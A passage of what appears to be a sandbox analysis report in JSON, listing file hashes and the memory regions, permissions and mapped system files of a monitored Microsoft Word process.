"process_00000009-region_00001537-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_229", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_137", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 331775, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_141", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 1507328, "filename": "\\Windows\\System32\\locale.nls", "id": "region_143", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3964927, "entry_point": 0, "filename": null, "id": "region_147", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_152", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4562943, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4943871, "entry_point": 0, "filename": null, "id": "region_156", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5054463, "entry_point": 0, "filename": null, "id": "region_158", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6295551, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7270399, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 7282687, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7344127, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7475199, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 7606271, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000000740000", "norm_filename": null, "region_type": "private_memory", "start_va": 7602176, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 7929855, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000000770000", "norm_filename": null, "region_type": "private_memory", "start_va": 7798784, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 8978431, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000000790000", "norm_filename": null, "region_type": "private_memory", "start_va": 7929856, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8982527, "entry_point": 0, "filename": null, "id": "region_169", "name": "pagefile_0x0000000000890000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8978432, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9048063, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 9109504, "type": "region", "version": 1 }, "end_va": 9113599, "entry_point": 0, "filename": null, "id": "region_171", "name": "pagefile_0x00000000008b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9109504, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 9191423, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9240576, "type": "region", "version": 1 }, "end_va": 10289151, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x00000000008d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9240576, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 14430207, "entry_point": 0, "filename": null, "id": "region_174", "name": "pagefile_0x00000000009d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10289152, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 15532031, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15597568, "type": "region", "version": 1 }, "end_va": 15601663, "entry_point": 0, "filename": null, "id": "region_176", "name": "private_0x0000000000ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15597568, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15728640, "type": "region", "version": 1 }, "end_va": 15732735, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000000f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 15728640, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15859712, "type": "region", "version": 1 }, "end_va": 15863807, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x0000000000f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 15859712, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 15994879, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x0000000000f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 15990784, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 16056320, "type": "region", "version": 1 }, "end_va": 16060415, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x0000000000f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 16056320, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 16121856, "type": "region", "version": 1 }, "end_va": 16130047, "entry_point": 0, "filename": null, "id": "region_181", "name": "pagefile_0x0000000000f60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16121856, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 16187392, "type": "region", "version": 1 }, "end_va": 16191487, "entry_point": 0, "filename": null, "id": "region_182", "name": "pagefile_0x0000000000f70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16187392, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 16252928, "type": "region", "version": 1 }, "end_va": 18182143, "entry_point": 16252928, "filename": "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "id": "region_183", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "region_type": "memory_mapped_file", "start_va": 16252928, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 18219008, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000001160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18219008, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 33746943, "entry_point": 30801920, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_185", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30801920, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 34275328, "type": "region", "version": 1 }, "end_va": 34537471, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x00000000020b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34275328, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34537472, "type": "region", "version": 1 }, "end_va": 34541567, "entry_point": 0, "filename": null, "id": "region_188", "name": "pagefile_0x00000000020f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34537472, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34603008, "type": "region", "version": 1 }, "end_va": 34607103, "entry_point": 34603008, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_189", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 34603008, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34672639, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34803711, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 34934783, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000002150000", "norm_filename": null, "region_type": "private_memory", "start_va": 34930688, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35065855, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35323904, "type": "region", "version": 1 }, "end_va": 35327999, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x00000000021b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35323904, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35524607, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35868671, "entry_point": 35717120, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_196", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 35717120, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35917823, "entry_point": 0, "filename": null, "id": "region_197", "name": "pagefile_0x0000000002240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35913728, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36048895, "entry_point": 35979264, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_198", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x0000000002290000", "norm_filename": null, "region_type": "private_memory", "start_va": 36241408, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37548031, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 38604799, "entry_point": 0, 